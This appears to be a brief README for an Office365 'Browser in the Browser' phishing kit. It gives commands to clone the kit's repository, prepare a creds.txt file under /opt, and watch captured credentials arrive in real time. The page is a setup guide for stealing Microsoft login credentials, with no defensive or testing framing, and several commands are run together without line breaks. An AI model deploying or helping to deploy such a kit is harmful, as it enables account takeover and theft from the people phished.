Office365 Phishing - Browser in the Browser
Office365 Phishing - Browser in the Browser
Get Started
git clone https://github.com/jakedmurphy1/O365-BITB.gitcd O365-BITBchmod 666 creds.txtmkdir /opt/O365-BITB && mv creds.txt /opt/O365-BITB/creds.txtWatch Creds in Real Time
tail -f /opt/O365-BITB/creds.txt | while read line; do echo $line; sleep 3; doneSources
REFERENCES
Last updated